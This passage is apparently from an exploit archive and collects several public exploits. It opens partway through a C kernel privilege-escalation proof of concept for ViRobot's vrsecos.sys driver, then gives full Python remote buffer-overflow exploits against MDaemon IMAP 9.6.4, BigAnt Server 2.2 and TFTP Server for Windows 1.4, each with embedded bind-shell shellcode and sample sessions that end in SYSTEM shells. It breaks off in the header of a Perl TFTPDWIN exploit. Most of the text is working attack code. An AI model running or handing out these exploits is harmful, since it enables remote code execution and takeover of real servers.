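    InbvSolidColorFill = (PINBV_SOLID_COLOR_FILL)RebaseKernelExport(hlib, ntosbase, "InbvSolidColorFill");
    InbvSetTextColor = (PINBV_SET_TEXT_COLOR)RebaseKernelExport(hlib, ntosbase, "InbvSetTextColor");
    InbvInstallDisplayStringFilter = (PINBV_INSTALL_DISPLAY_STRING_FILTER)RebaseKernelExport(hlib, ntosbase, "InbvInstallDisplayStringFilter");
    InbvEnableDisplayString = (PINBV_ENABLE_DISPLAY_STRING)RebaseKernelExport(hlib, ntosbase, "InbvEnableDisplayString");
    InbvSetScrollRegion = (PINVB_SET_SCROLL_REGION)RebaseKernelExport(hlib, ntosbase, "InbvSetScrollRegion");
    InbvDisplayString = (PINBV_DISPLAY_STRING)RebaseKernelExport(hlib, ntosbase, "InbvDisplayString");
    if (InbvAcquireDisplayOwnership &&
        InbvResetDisplay &&
        InbvSolidColorFill &&
        InbvSetTextColor &&
        InbvInstallDisplayStringFilter &&
        InbvEnableDisplayString &&
        InbvSetScrollRegion &&
        InbvDisplayString)
    {
        return TRUE ;
    }
    return FALSE ;
}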
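// Load address of the kernel module whose image name ends with `suffix`
// (case-insensitive), or NULL if none matches.
static PVOID FindModuleBase(PSYSTEM_MODULE_INFORMATION pmi, PCSTR suffix)
{
    size_t suffixLen = strlen(suffix);
    for (ULONG i = 0; i < pmi->Count; i++)
    {
        PCSTR name = pmi->Module[i].ImageName;
        size_t nameLen = strlen(name);
        // Only the tail of the name is compared (as in the original), but
        // guard the subtraction so a short name cannot index before the buffer.
        if (nameLen >= suffixLen && stricmp(name + nameLen - suffixLen, suffix) == 0)
        {
            return pmi->Module[i].Base;
        }
    }
    return NULL;
}

// Kernel object backing `handle` in process `pid`, looked up in the system
// handle table; NULL when no entry matches.
static PVOID FindHandleObject(PSYSTEM_HANDLE_INFORMATION phi, USHORT pid, USHORT handle)
{
    for (ULONG i = 0; i < phi->NumberOfHandles; i++)
    {
        if (phi->Information[i].HandleValue == handle &&
            phi->Information[i].UniqueProcessId == pid)
        {
            return phi->Information[i].Object;
        }
    }
    return NULL;
}

// Proof of concept for the VRsecos.sys overflow (IOCTL 0x8307202c).
//
// Sequence: open the device, build a 0x1000-byte input buffer whose bytes
// land over the driver's data area (a fake KMUTANT owned by this thread plus
// a fake NPAGED_LOOKASIDE_LIST whose AllocateRoutine is InbvShellCode), fire
// the overflowing IOCTL, then call IOCTL 0x83072014 twice; per the original
// comments the second call goes through the planted AllocateRoutine.
// All offsets are specific to vrsecos.sys 2008.8.1.1 on XP SP3.
//
// Failure paths that the original had commented out (unopenable device,
// driver not found) now return, since continuing with an invalid handle or a
// NULL module base only produces garbage writes.
int main(int argc, char* argv[])
{
    printf("ViRotbot Desktop 5.5 & ViRobot Server 3.5 vrsecos.sys <= 2008.8.1.1\n"
    "Local Kernel Mode Privilege Escalation Vulnerability POC\n\n"
    "This Exploit Code Only for vrsecos == 2008.8.1.1\n"
    "Test On Windows XP SP3\n\n"
    "By MJ0011 th_decoder$126.com\n\n"
    "Press Enter\n");
    getchar();
    HANDLE hDev = CreateFile("\\\\.\\VRsecos" , FILE_READ_ATTRIBUTES , FILE_SHARE_READ , 0 , OPEN_EXISTING , 0 , 0 );
    if (hDev == INVALID_HANDLE_VALUE)
    {
        printf("cannot open device....%u\n" , GetLastError());
        return 0;
    }
    //data for IoControlCode = 8307202C , buffer overrun
    PVOID pdata = malloc(0x2000);
    if (pdata == NULL)
    {
        printf("out of memory\n");
        return 0;
    }
    //fill non-zero data
    memset(pdata , 0x20 , 0x2000);
    //process mutx ...
    PX_KMUTANT pmutant = (PX_KMUTANT)((ULONG)pdata + 0x858 + 200);
    HANDLE hthread = OpenThread(THREAD_ALL_ACCESS , FALSE , GetCurrentThreadId());
    if (hthread == NULL)
    {
        printf("cannot open own thread....%u\n" , GetLastError());
        return 0;
    }
    PSYSTEM_HANDLE_INFORMATION phi = (PSYSTEM_HANDLE_INFORMATION)GetInfoTable(SystemHandleInformation);
    PSYSTEM_MODULE_INFORMATION pmi = (PSYSTEM_MODULE_INFORMATION)GetInfoTable(SystemModuleInformation);
    if (phi == NULL || pmi == NULL || pmi->Count == 0)
    {
        printf("cannot query system handle/module tables\n");
        return 0;
    }
    //get base address of vrsecos.sys
    PVOID vrsecosbase = FindModuleBase(pmi, "vrsecos.sys");
    if (vrsecosbase == 0 )
    {
        printf("cannot find vrsecos....\n");
        return 0;
    }
    // Module[0] is taken to be the kernel image; LoadLibrary wants the bare
    // file name. Fall back to the whole string if there is no path separator
    // (strrchr() would return NULL and the original's +1 would be address 1).
    PCSTR ntosname = strrchr(pmi->Module[0].ImageName , '\\');
    ntosname = ntosname ? ntosname + 1 : pmi->Module[0].ImageName;
    if (!InbvInit(pmi->Module[0].Base , (PSTR)ntosname))
    {
        printf("cannot init inbv system\n");
        return 0 ;
    }
    //get thread object
    PVOID MyThreadOBJ = FindHandleObject(phi, (USHORT)GetCurrentProcessId(), (USHORT)(ULONG_PTR)hthread);
    if (MyThreadOBJ == NULL)
    {
        printf("cannot find my thread object\n");
        return 0 ;
    }
    //for KeWaitForSignleObject
    //KeWaitForSignleObject will check SignalState
    pmutant->Header.SignalState = 0x30303030;
    pmutant->MutantListEntry.Flink = (PLIST_ENTRY)((ULONG)vrsecosbase + 0x2db0 );
    pmutant->MutantListEntry.Blink = (PLIST_ENTRY)((ULONG)vrsecosbase + 0x2db0) ;
    //for KeReleaseMutex , Mutant 's owner thread must be our thread when KeReleaseMutex
    pmutant->OwnerThread = MyThreadOBJ;
    //for IOCTL CODE 0x83072014
    //spec NPAGED_LOOKASIDE_LIST List
    //
    // user address space
    PVOID pAlloc = VirtualAlloc((PVOID)0x0A0A0A0A , 0x1000 , MEM_RESERVE|MEM_COMMIT , PAGE_READWRITE);
    if (pAlloc == NULL)
    {
        printf("cannot allocate spec addr %u\n! ", GetLastError());
        return 0 ;
    }
    *(DWORD*)0x0a0a0101 = 0 ;
    // vrsecos+2d68 < vrsecos+2d64
    // and vrsecos+2d68 < 0
    *(DWORD*)((ULONG)pdata + 0x81c +200) = 0xc1c1c1c1 ;
    *(DWORD*)((ULONG)pdata + 0x820 + 200) = 0xc0c0c0c0 ;
    //fill NPAGED_LOOKASIDE_LIST
    *(DWORD*)((ULONG)pdata + 0xdd8 + 200) = 0x0a0a0101;
    *(DWORD*)((ULONG)pdata + 0xddc +200 ) = 0x01010101 ;
    //fill NPAGE_LOOKASIDE_LIST->AllocateRoutine
    //is our R0 Shell Code !!!
    *(DWORD*)((ULONG)pdata + 0xdd8 + 0x28 +200 ) = (DWORD)InbvShellCode;
    ULONG btr ;
    ULONG temp;
    //memory overflow!!
    if (!DeviceIoControl(hDev , 0x8307202c , pdata , 0x1000 , NULL , 0 , &btr , NULL ))
    {
        printf("dev ctl 1 failed %u\n", GetLastError());
        return 0 ;
    }
    // Input for IOCTL 0x83072014 (0x6d4 == 1748 bytes). Only the fields below
    // are set; the rest is whatever malloc returned, as in the original.
    PVOID pdata2 = malloc(0x6d4);
    if (pdata2 == NULL)
    {
        printf("out of memory\n");
        return 0;
    }
    *(DWORD*)pdata2 = 1;
    *(ULONG*)((ULONG)pdata2 + 8 ) = 0 ;
    strcpy((PCHAR)((ULONG)pdata2 + 264) , "exploit you !");
    strcpy((PCHAR)((ULONG)pdata2 + 464) , "exploit you !!");
    //first time , NPAGED_LOOKASIDE_LIST got ZERO !!
    if (!DeviceIoControl(hDev , 0x83072014 , pdata2 , 1748 , &temp , 4 , &btr , 0 ))
    {
        printf("dev ctrl 2 failed %u\n", GetLastError());
        return 0 ;
    }
    //second time , go NPAGED_LOOKASIDE_LIST->AllocateRoutine!!
    if (!DeviceIoControl(hDev , 0x83072014 , pdata2 , 1748 , &temp , 4 , &btr , 0 ))
    {
        printf("dev ctrl 2 failed %u\n", GetLastError());
        return 0 ;
    }
    return 0 ;
}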
ViRobot Desktop version 5.5 and Server version 3.5 local kernel mode privilege escalation exploit.
Matteo Memelli/MDaemon IMAP server 9.6.4 (FETCH) Remote Buffer Overflow Exploit ( windows)
#!/usr/bin/python
###############################################################################
#
# MDAEMON (POST AUTH) REMOTE R00T IMAP FETCH COMMAND UNIVERSAL EXPLOIT 0day
# Bug discovered and coded by Matteo Memelli aka ryujin
# http://www.gray-world.net http://www.be4mind.com
#
# Affected Versions : MDaemon IMAP server v9.6.4
# Tested on OS : Windows 2000 SP4 English
# Windows XP Sp2 English
# Windows 2003 Standard Edition Italian
# Discovery Date : 03/13/2008
#
#-----------------------------------------------------------------------------
#
# muts AS YOU CAN SEE, I ALWAYS MAINTAIN MY PROMISES! LOL
#
# Thx to Silvia for feeding my obsessions
# Thx to didNot at #offsec
# (yes he doesn't look like Silvia but he's a nice guy LOL)
# and to www.offensive-security.com
#
#-----------------------------------------------------------------------------
##############################################################################
# [+] Connecting to imap server...
# * OK test.local IMAP4rev1 MDaemon 9.6.4 ready
#
# [+] Logging in...
# 0001 OK LOGIN completed
#
# [+] Selecting Inbox Folder...
# * FLAGS (\Seen \Answered \Flagged \Deleted \Draft \Recent)
# * 16 EXISTS
# * 16 RECENT
# * OK [UNSEEN 1] first unseen
# * OK [UIDVALIDITY 1205411202] UIDs valid
# * OK [UIDNEXT 17] Predicted next UID
# * OK [PERMANENTFLAGS (\Seen \Answered \Flagged \Deleted \Draft)] .
# 0002 OK [READ-WRITE] SELECT completed
#
# [+] We need at least one message in Inbox, appending one...
# + Ready for append literal
#
# [+] What would you like for dinner? SPAGHETTI AND PWNSAUCE?
# * 17 EXISTS
# * 17 RECENT
# 0003 OK [APPENDUID 1205411202 17] APPEND completed
#
# [+] DINNER'S READY: Sending Evil Buffer...
# [+] DONE! Check your shell on 192.168.1.195:4444
#
#
# matte@badrobot:~$ nc 192.168.1.195 4444
# (UNKNOWN) [192.168.1.195] 4444 (?) : Connection refused
# matte@badrobot:~$ nc 192.168.1.195 4444
# Microsoft Windows 2000 [Version 5.00.2195]
# (C) Copyright 1985-2000 Microsoft Corp.
#
# C:\MDaemon\APP>whoami
# whoami
# NT AUTHORITY\SYSTEM
#
# C:\MDaemon\APP>
##############################################################################
from socket import *
from optparse import OptionParser
import sys, time
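print("[*********************************************************************]")
print("[* *]")
print("[* MDAEMON (POST AUTH) REMOTE R00T IMAP FETCH COMMAND EXPLOIT *]")
print("[* DISCOVERED AND CODED *]")
print("[* by *]")
print("[* MATTEO MEMELLI *]")
print("[* (ryujin) *]")
print("[* www.be4mind.com - www.gray-world.net *]")
print("[* *]")
print("[*********************************************************************]")

# All four options are required: the overflow is only reachable after LOGIN.
usage = "%prog -H TARGET_HOST -P TARGET_PORT -l USER -p PASSWD"
parser = OptionParser(usage=usage)
parser.add_option("-H", "--target_host", type="string",
                  action="store", dest="HOST",
                  help="Target Host")
parser.add_option("-P", "--target_port", type="int",
                  action="store", dest="PORT",
                  help="Target Port")
parser.add_option("-l", "--login-user", type="string",
                  action="store", dest="USER",
                  help="User login")
parser.add_option("-p", "--login-password", type="string",
                  action="store", dest="PASSWD",
                  help="User password")
(options, args) = parser.parse_args()
HOST = options.HOST
PORT = options.PORT
USER = options.USER
PASSWD = options.PASSWD
if not (HOST and PORT and USER and PASSWD):
    parser.print_help()
    sys.exit()

# windows/shell_bind_tcp - 317 bytes
# http://www.metasploit.com
# EXITFUNC=thread, LPORT=4444
shellcode = (
    "\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24\x8b"
    "\x45\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\x20\x01"
    "\xeb\x49\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\x07"
    "\xc1\xca\x0d\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f"
    "\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b"
    "\x89\x6c\x24\x1c\x61\xc3\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c"
    "\x8b\x70\x1c\xad\x8b\x40\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff"
    "\xd6\x66\x53\x66\x68\x33\x32\x68\x77\x73\x32\x5f\x54\xff\xd0"
    "\x68\xcb\xed\xfc\x3b\x50\xff\xd6\x5f\x89\xe5\x66\x81\xed\x08"
    "\x02\x55\x6a\x02\xff\xd0\x68\xd9\x09\xf5\xad\x57\xff\xd6\x53"
    "\x53\x53\x53\x53\x43\x53\x43\x53\xff\xd0\x66\x68\x11\x5c\x66"
    "\x53\x89\xe1\x95\x68\xa4\x1a\x70\xc7\x57\xff\xd6\x6a\x10\x51"
    "\x55\xff\xd0\x68\xa4\xad\x2e\xe9\x57\xff\xd6\x53\x55\xff\xd0"
    "\x68\xe5\x49\x86\x49\x57\xff\xd6\x50\x54\x54\x55\xff\xd0\x93"
    "\x68\xe7\x79\xc6\x79\x57\xff\xd6\x55\xff\xd0\x66\x6a\x64\x66"
    "\x68\x63\x6d\x89\xe5\x6a\x50\x59\x29\xcc\x89\xe7\x6a\x44\x89"
    "\xe2\x31\xc0\xf3\xaa\xfe\x42\x2d\xfe\x42\x2c\x93\x8d\x7a\x38"
    "\xab\xab\xab\x68\x72\xfe\xb3\x16\xff\x75\x44\xff\xd6\x5b\x57"
    "\x52\x51\x51\x51\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\xd9"
    "\x05\xce\x53\xff\xd6\x6a\xff\xff\x37\xff\xd0\x8b\x57\xfc\x83"
    "\xc4\x64\xff\xd6\x52\xff\xd0\x68\xef\xce\xe0\x60\x53\xff\xd6"
    "\xff\xd0"
)


def imap_step(sock, label, data, tag, expect):
    """Send one raw IMAP line and read the server's reply for it.

    sock:   connected socket
    label:  progress line printed before sending
    data:   bytes to send verbatim (caller supplies the CRLF)
    tag:    the command's tag; a reply line starting with it means the server
            is done with the command even if `expect` never showed up
    expect: substring the reply must contain (the tagged OK, or "+ " for the
            APPEND continuation); when it is missing the socket is closed and
            the script exits, because the FETCH below is only reachable in an
            authenticated, selected session and the original sent it anyway.

    Uses sendall() rather than send(): send() may write fewer bytes than
    requested, which for the ~900-byte FETCH line would silently truncate the
    overflow. Reads until the reply is complete, since multi-line replies
    (SELECT's untagged status lines) can span more than one recv() segment.
    """
    print(label)
    sock.sendall(data)
    reply = ""
    while expect not in reply:
        if reply.startswith(tag + " ") or ("\r\n" + tag + " ") in reply:
            break
        chunk = sock.recv(1024)
        if not chunk:
            break
        reply += chunk
    print(reply)
    if expect not in reply:
        sock.close()
        sys.exit(" [-] Unexpected reply, wanted %r -- aborting" % expect)
    return reply


s = socket(AF_INET, SOCK_STREAM)
print(" [+] Connecting to imap server...")
s.connect((HOST, PORT))
print(s.recv(1024))
imap_step(s, " [+] Logging in...",
          "0001 LOGIN %s %s\r\n" % (USER, PASSWD), "0001", "0001 OK")
imap_step(s, " [+] Selecting Inbox Folder...",
          "0002 SELECT Inbox\r\n", "0002", "0002 OK")
# APPEND announces a 1-byte literal; the server answers with a "+" continuation
# before the literal is sent (the original sends a longer line, kept as is).
imap_step(s, " [+] We need at least one message in Inbox, appending one...",
          '0003 APPEND Inbox {1}\r\n', "0003", "+ ")
imap_step(s, " [+] What would you like for dinner? SPAGHETTI A.ND PWNSAUCE?".replace("A.ND", "AND"),
          'SPAGHETTI AND PWNSAUCE\r\n', "0003", "0003 OK")
print(" [+] DINNER'S READY: Sending Evil Buffer...")
# Seh overwrite at 532 Bytes (528 filler + 4-byte next-SEH short jump)
# pop edi; pop ebp; ret; From mdaemon/HashCash.dll
EVIL = "A"*528 + "\xEB\x06\x90\x90" + "\x8b\x11\xdc\x64" + "\x90"*8 + shellcode + 'C'*35
s.sendall("A654 FETCH 2:4 (FLAGS BODY[" + EVIL + " (DATE FROM)])\r\n")
s.close()
print(" [+] DONE! Check your shell on %s:%d" % (HOST, 4444))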
# milw0rm.com [2008-03-13]
Matteo Memelli/BigAnt Server 2.2 PreAuth Remote SEH Overflow Exploit (0day) ( windows)
#!/usr/bin/python
###############################################################################
# BigAnt Server Ver 2.2 PreAuth Remote SEH Overflow (0day)
# Matteo Memelli aka ryujin
# www.be4mind.com - www.gray-world.net
# 04/13/2008
# Tested on Windows 2000 Sp4 English
# Vulnerable process is AntServer.exe
# Offset for SEH overwrite is 954 Bytes
#
#------------------------------------------------------------------------------
# muts you gave me the wrong pill! it's your fault!!!
# I wanna go back to the matrix
#------------------------------------------------------------------------------
#
# bt ~ # ./antserver_exploit.py -H 192.168.1.195 -P 6080
# [+] Connecting to host...
# [+] Overflowing the buffer...
# [+] Done! Check your shell on 192.168.1.195:6080
# bt ~ # nc -vv 192.168.1.195 4444
# 192.168.1.195: inverse host lookup failed: Unknown host
# (UNKNOWN) [192.168.1.195] 4444 (krb524) open
# Microsoft Windows 2000 [Version 5.00.2195]
# (C) Copyright 1985-2000 Microsoft Corp.
#
# C:\WINNT\system32>
#
###############################################################################
from socket import *
from optparse import OptionParser
import sys
# Console banner (Python 2 print statements throughout this script).
print "[*********************************************************************]"
print "[* *]"
print "[* BigAnt Server PreAuth Remote SEH Overflow (0day) *]"
print "[* Discovered and Coded By *]"
print "[* Matteo Memelli *]"
print "[* (ryujin) *]"
print "[* www.be4mind.com - www.gray-world.net *]"
print "[* *]"
print "[*********************************************************************]"
# Command-line handling: -H and -P are both mandatory; if either is missing
# the option help is printed and the script exits without touching the network.
usage = "%prog -H TARGET_HOST -P TARGET_PORT"
parser = OptionParser(usage=usage)
parser.add_option("-H", "--target_host", type="string",
                  action="store", dest="HOST",
                  help="Target Host")
parser.add_option("-P", "--target_port", type="int",
                  action="store", dest="PORT",
                  help="Target Port")
(options, args) = parser.parse_args()
HOST = options.HOST
PORT = options.PORT
if not (HOST and PORT):
    parser.print_help()
    sys.exit()
# Tried with SEH/THREAD/PROCESS but server crashes anyway
# [*] x86/alpha_mixed succeeded, final size 698 SEH
# Opaque encoded payload blob; the generator note above is its only
# description, nothing about it is derivable from this file.
shellcode = (
"\x89\xe1\xda\xc0\xd9\x71\xf4\x58\x50\x59\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
"\x4b\x4c\x43\x5a\x4a\x4b\x50\x4d\x4b\x58\x4a\x59\x4b\x4f\x4b"
"\x4f\x4b\x4f\x43\x50\x4c\x4b\x42\x4c\x47\x54\x47\x54\x4c\x4b"
"\x47\x35\x47\x4c\x4c\x4b\x43\x4c\x44\x45\x43\x48\x45\x51\x4a"
"\x4f\x4c\x4b\x50\x4f\x44\x58\x4c\x4b\x51\x4f\x51\x30\x45\x51"
"\x4a\x4b\x47\x39\x4c\x4b\x50\x34\x4c\x4b\x43\x31\x4a\x4e\x46"
"\x51\x49\x50\x4a\x39\x4e\x4c\x4d\x54\x49\x50\x42\x54\x44\x47"
"\x49\x51\x49\x5a\x44\x4d\x43\x31\x49\x52\x4a\x4b\x4c\x34\x47"
"\x4b\x46\x34\x47\x54\x47\x58\x42\x55\x4b\x55\x4c\x4b\x51\x4f"
"\x46\x44\x43\x31\x4a\x4b\x43\x56\x4c\x4b\x44\x4c\x50\x4b\x4c"
"\x4b\x51\x4f\x45\x4c\x43\x31\x4a\x4b\x44\x43\x46\x4c\x4c\x4b"
"\x4d\x59\x42\x4c\x47\x54\x45\x4c\x45\x31\x49\x53\x50\x31\x49"
"\x4b\x42\x44\x4c\x4b\x47\x33\x50\x30\x4c\x4b\x47\x30\x44\x4c"
"\x4c\x4b\x44\x30\x45\x4c\x4e\x4d\x4c\x4b\x47\x30\x43\x38\x51"
"\x4e\x45\x38\x4c\x4e\x50\x4e\x44\x4e\x4a\x4c\x50\x50\x4b\x4f"
"\x4e\x36\x42\x46\x51\x43\x42\x46\x43\x58\x47\x43\x50\x32\x42"
"\x48\x42\x57\x43\x43\x50\x32\x51\x4f\x51\x44\x4b\x4f\x4e\x30"
"\x43\x58\x48\x4b\x4a\x4d\x4b\x4c\x47\x4b\x46\x30\x4b\x4f\x4e"
"\x36\x51\x4f\x4d\x59\x4d\x35\x45\x36\x4b\x31\x4a\x4d\x45\x58"
"\x43\x32\x50\x55\x42\x4a\x44\x42\x4b\x4f\x48\x50\x43\x58\x49"
"\x49\x45\x59\x4c\x35\x4e\x4d\x50\x57\x4b\x4f\x48\x56\x46\x33"
"\x46\x33\x50\x53\x50\x53\x46\x33\x47\x33\x46\x33\x51\x53\x46"
"\x33\x4b\x4f\x4e\x30\x45\x36\x42\x48\x42\x31\x51\x4c\x45\x36"
"\x50\x53\x4b\x39\x4d\x31\x4c\x55\x42\x48\x49\x34\x44\x5a\x44"
"\x30\x49\x57\x50\x57\x4b\x4f\x49\x46\x42\x4a\x42\x30\x46\x31"
"\x51\x45\x4b\x4f\x48\x50\x43\x58\x4e\x44\x4e\x4d\x46\x4e\x4b"
"\x59\x51\x47\x4b\x4f\x48\x56\x46\x33\x50\x55\x4b\x4f\x48\x50"
"\x42\x48\x4a\x45\x47\x39\x4b\x36\x47\x39\x51\x47\x4b\x4f\x4e"
"\x36\x46\x30\x46\x34\x46\x34\x50\x55\x4b\x4f\x4e\x30\x4a\x33"
"\x43\x58\x4a\x47\x44\x39\x49\x56\x44\x39\x46\x37\x4b\x4f\x49"
"\x46\x46\x35\x4b\x4f\x48\x50\x42\x46\x43\x5a\x42\x44\x45\x36"
"\x42\x48\x45\x33\x42\x4d\x4c\x49\x4d\x35\x42\x4a\x50\x50\x46"
"\x39\x47\x59\x48\x4c\x4d\x59\x4a\x47\x43\x5a\x51\x54\x4d\x59"
"\x4a\x42\x46\x51\x49\x50\x4c\x33\x4e\x4a\x4b\x4e\x51\x52\x46"
"\x4d\x4b\x4e\x50\x42\x46\x4c\x4d\x43\x4c\x4d\x42\x5a\x46\x58"
"\x4e\x4b\x4e\x4b\x4e\x4b\x42\x48\x43\x42\x4b\x4e\x4e\x53\x42"
"\x36\x4b\x4f\x43\x45\x51\x54\x4b\x4f\x48\x56\x51\x4b\x50\x57"
"\x46\x32\x46\x31\x50\x51\x50\x51\x43\x5a\x43\x31\x46\x31\x50"
"\x51\x51\x45\x50\x51\x4b\x4f\x4e\x30\x42\x48\x4e\x4d\x49\x49"
"\x43\x35\x48\x4e\x50\x53\x4b\x4f\x49\x46\x43\x5a\x4b\x4f\x4b"
"\x4f\x47\x47\x4b\x4f\x4e\x30\x4c\x4b\x51\x47\x4b\x4c\x4b\x33"
"\x48\x44\x45\x34\x4b\x4f\x49\x46\x46\x32\x4b\x4f\x4e\x30\x45"
"\x38\x4a\x50\x4c\x4a\x44\x44\x51\x4f\x51\x43\x4b\x4f\x48\x56"
"\x4b\x4f\x48\x50\x44\x4a\x41\x41"
)
# 77F8AEDC POP POP RET User32.dll Win 2000 Sp4
# Fixed buffer layout: NOP runs, the payload blob, a single hard-coded address
# (see the comment above) and filler. Everything is tied to the one build named
# in the header (Windows 2000 SP4 English); on any other build the request
# presumably just crashes the service rather than running the payload -- TODO
# confirm.
evilbuf = '\x90'*252 + shellcode + '\xeb\x06\x90\x90' + \
          '\xDC\xAE\xF8\x77' + '\x90'*8 + '\xE9\x82\xFC\xFF\xFF' + \
          'C'*1225
print '[+] Connecting to host...'
s = socket(AF_INET, SOCK_STREAM)
# s.connect(('192.168.1.195', 6080))
s.connect((HOST, PORT))
print '[+] Overflowing the buffer...'
# The only traffic this script produces: one pre-authentication request whose
# request line is several kilobytes long; no reply is read. An abnormally long
# first request line on the service port is the observable for detection.
s.send('GET ' + evilbuf + "\n\n")
s.close()
# NOTE(review): this reports the service port that was connected to, not the
# port a shell would be on (the transcript in the header connects to 4444).
print '[+] Done! Check your shell on %s:%d' % (HOST, PORT)
# milw0rm.com [2008-04-15]
muts/TFTP Server for Windows 1.4 ST Buffer Overflow Exploit (0day) ( windows)
#!/usr/bin/python
# TFTP Server for Windows V1.4 ST (0day)
# http://sourceforge.net/projects/tftp-server/
# Tested on Windows Vista SP0.
# Coded by Mati Aharoni
# muts..at..offensive-security.com
# http://www.offensive-security.com/0day/sourceforge-tftpd.py.txt
##################################################################
# bt ~ # sourceforge-tftpd.py
# [*] TFTP Server for Windows V1.4 ST (0day)
# [*] http://www.offensive-security.com
# [*] Sending evil packet, ph33r
# [*] Check port 4444 for bindshell
# bt ~ # nc -v 172.16.167.134 4444
# (UNKNOWN) [172.16.167.134] 4444 (krb524) open
# Microsoft Windows [Version 6.0.6000]
# Copyright (c) 2006 Microsoft Corporation. All
# rights reserved.
#
# C:\Windows\system32>
##################################################################
import socket
import sys
print "[*] TFTP Server for Windows V1.4 ST (0day)"
print "[*] http://www.offensive-security.com"
# Target is hard-coded; this script has no argument handling at all.
host = '172.16.167.134'
port = 69
try:
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
except:
    # Bare except: also catches SystemExit/KeyboardInterrupt.
    print "socket() failed"
    sys.exit(1)
# Jump back shellcode
# Small opaque byte blob; the author's label above is its only description.
sc = "\x6a\x05\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x16\x91\x9c"
sc +="\x30\x83\xeb\xfc\xe2\xf4\xcf\x7f\x45\x44\x32\x65\xc5\xb0\xd7\x9b"
sc +="\x0c\xce\xdb\x6f\x51\xcf\xf7\x91\x9c\x30"
# windows/shell_bind_tcp - 317 bytes
# http://www.metasploit.com
# EXITFUNC=seh, LPORT=4444
# Opaque payload blob; per the generator note above it is a bind shell on 4444.
shell=("\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24\x8b"
"\x45\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\x20\x01"
"\xeb\x49\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\x07"
"\xc1\xca\x0d\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f"
"\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b"
"\x89\x6c\x24\x1c\x61\xc3\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c"
"\x8b\x70\x1c\xad\x8b\x40\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff"
"\xd6\x66\x53\x66\x68\x33\x32\x68\x77\x73\x32\x5f\x54\xff\xd0"
"\x68\xcb\xed\xfc\x3b\x50\xff\xd6\x5f\x89\xe5\x66\x81\xed\x08"
"\x02\x55\x6a\x02\xff\xd0\x68\xd9\x09\xf5\xad\x57\xff\xd6\x53"
"\x53\x53\x53\x53\x43\x53\x43\x53\xff\xd0\x66\x68\x11\x5c\x66"
"\x53\x89\xe1\x95\x68\xa4\x1a\x70\xc7\x57\xff\xd6\x6a\x10\x51"
"\x55\xff\xd0\x68\xa4\xad\x2e\xe9\x57\xff\xd6\x53\x55\xff\xd0"
"\x68\xe5\x49\x86\x49\x57\xff\xd6\x50\x54\x54\x55\xff\xd0\x93"
"\x68\xe7\x79\xc6\x79\x57\xff\xd6\x55\xff\xd0\x66\x6a\x64\x66"
"\x68\x63\x6d\x89\xe5\x6a\x50\x59\x29\xcc\x89\xe7\x6a\x44\x89"
"\xe2\x31\xc0\xf3\xaa\xfe\x42\x2d\xfe\x42\x2c\x93\x8d\x7a\x38"
"\xab\xab\xab\x68\x72\xfe\xb3\x16\xff\x75\x44\xff\xd6\x5b\x57"
"\x52\x51\x51\x51\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\xd9"
"\x05\xce\x53\xff\xd6\x6a\xff\xff\x37\xff\xd0\x8b\x57\xfc\x83"
"\xc4\x64\xff\xd6\x52\xff\xd0\x68\xf0\x8a\x04\x5f\x53\xff\xd6"
"\xff\xd0")
# The whole buffer (well over 1 KB: NOP runs, both blobs and a few fixed bytes)
# is used as the request's "filename" field.
filename = "\x90"*860 + shell + "\x90"*14 + sc + "\xeb\xd0\x90\x90" + "\x2b\x0e\x41"
mode = "netascii"
# TFTP write request framing (opcode 2 per RFC 1350): opcode, filename, NUL,
# mode, NUL. A WRQ whose filename field is this long is the observable on UDP/69.
muha = "\x00\x02" + filename+ "\0" + mode+ "\0"
print "[*] Sending evil packet, ph33r"
# Single datagram, fire-and-forget: nothing is read back and the socket is
# never closed explicitly.
s.sendto(muha, (host, port))
print "[*] Check port 4444 for bindshell"
# milw0rm.com [2008-03-26]
SkD/ProSysInfo TFTP server TFTPDWIN <= 0.4.2 Univ. Remote BOF Exploit ( windows)
#!/usr/bin/perl
#
# ProSysInfo TFTP server TFTPDWIN <= 0.4.2
# Universal Remote Buffer Overflow Exploit
# [Works on all Windows versions.]
# ----------------------------------------
# Exploit by SkD (skdrat@hotmail.com)
#
# Let's take a description from their page at:
# http://www.tftpserver.prosysinfo.com.pl
#
# "The TFTP Server TFTPDWIN software is a
# multithreaded TFTP protocol server for
# Windows 98/Me/2000/XP/2003. TFTP Server
# TFTPDWIN is compatible with RFC 1350,
# RFC 2347, RFC 2348, and RFC 2349, documents."
#
# Some of their clients include: CISCO, Alcatel-Lucent,
# Intel, AT&T, Panasonic, Boeing ...
#
# Wow, all of these companies use this software!
# This is pretty much serious.
#
# So this is my new exploit and I made it universal like
# the last one. This overflow was pretty much weird at
# first sight, but a bit of looking into the software
# can tell you many things about it!
#
# If Immunity (www.immunityinc.com) can make a commerical
# exploit for this and keep it for private clients,
# so can I ;) but to the public :). Have fun ladies &
# gents.
#
# Usage: prosystftpd_exploit.pl <target IP>
#
# Greets fly to InTeL.
#
# WARNING: Author has no responsibility over the damage
# you do using this!
